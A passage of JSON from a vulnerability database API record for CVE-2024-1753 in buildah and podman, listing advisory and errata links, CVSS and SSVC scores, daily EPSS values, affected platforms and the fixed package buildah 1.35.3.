:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2645","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2645"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2669","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2669"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2672","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2672"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2784","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2784"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2877","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2877"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3254","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:3254"},{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json"},{"reference_url":"https://access.redhat.com/security/cve/CVE-2024-1753","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/security/cve/CVE-2024-1753"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-1753","reference_id":"","reference_type":"","scores":[{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.19976","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20034","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.2267","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22677","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22752","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22804","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22826","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22788","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22731","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22747","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22742","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22702","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.2254","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22531","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22529","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22433","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22517","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22595","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22561","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22576","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22653","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-1753"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2265513","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2265513"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf"},{"reference_url":"https://github.com/containers/podman","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/containers/podman"},{"reference_url":"https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-1753","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-1753"},{"reference_url":"https://pkg.go.dev/vuln/GO-2024-2658","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://pkg.go.dev/vuln/GO-2024-2658"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800","reference_id":"1067800","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream","reference_id":"cpe:/a:redhat:enterprise_linux:8::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream","reference_id":"cpe:/a:redhat:enterprise_linux:9::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11","reference_id":"cpe:/a:redhat:openshift:3.11","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8","reference_id":"cpe:/a:redhat:openshift:4.12::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9","reference_id":"cpe:/a:redhat:openshift:4.12::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8","reference_id":"cpe:/a:redhat:openshift:4.13::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9","reference_id":"cpe:/a:redhat:openshift:4.13::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8","reference_id":"cpe:/a:redhat:openshift:4.14::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9","reference_id":"cpe:/a:redhat:openshift:4.14::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8","reference_id":"cpe:/a:redhat:openshift:4.15::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9","reference_id":"cpe:/a:redhat:openshift:4.15::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream","reference_id":"cpe:/a:redhat:rhel_eus:8.6::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream","reference_id":"cpe:/a:redhat:rhel_eus:8.8::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream","reference_id":"cpe:/a:redhat:rhel_eus:9.0::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream","reference_id":"cpe:/a:redhat:rhel_eus:9.2::appstream","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7","reference_id":"cpe:/o:redhat:enterprise_linux:7","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7"},{"reference_url":"https://security.gentoo.org/glsa/202407-12","reference_id":"GLSA-202407-12","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-12"},{"reference_url":"https://security.gentoo.org/glsa/202407-25","reference_id":"GLSA-202407-25","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-25"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}],"aliases":["CVE-2024-1753","GHSA-874v-pj72-92f3"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gyyv-8fkv-syh5"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}